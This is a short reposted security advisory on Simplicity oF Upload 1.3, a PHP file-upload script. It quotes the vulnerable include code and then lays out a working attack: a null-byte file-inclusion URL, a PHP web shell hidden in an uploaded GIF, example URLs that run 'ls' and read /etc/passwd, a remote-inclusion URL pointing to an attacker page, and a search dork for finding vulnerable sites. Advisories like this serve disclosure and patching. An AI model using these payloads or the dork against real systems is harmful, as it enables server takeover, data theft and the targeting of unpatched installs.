[转载]Simplicity OF Upload 1.3远程代码执行及跨站脚本漏洞分析

信息来源：http://www.phpsimplicity.com/scripts.php?id=3

remote commands execution:

problem at line 25-30:
...
//check for language overriding..
if (isset($_GET['language']))
$language = strtolower($_GET['language']);

//now we include the language file
require_once("$language.lng");
...

you can include whatever adding a null byte to "language" parameter value:

example:
http://localhost:30/simply/download.php?language=upload.php%00

you will see upload & download page together :)

so you can upload a cmd.gif (when you upload a .php file, usually it is
renamed to .html...) file with this php code inside to execute
commands:

<?php

system($HTTP_GET_VARS[command]);

?>

then try this url:

http://[target]/[path]/download.php?language=cmd.gif%00&command=ls

to list directories

http://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwd

to show /etc/passwd file

cross site scripting:

also, a remote user can supply a specially crafted URL to redirect other people
to an evil page:

http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00
googledork:

"Powered By: Simplicity oF Upload"

rgod
email: rgod[at]autistici.org
site: http://rgod.altervista.org
original advisory: http://rgod.altervista.org/simply.html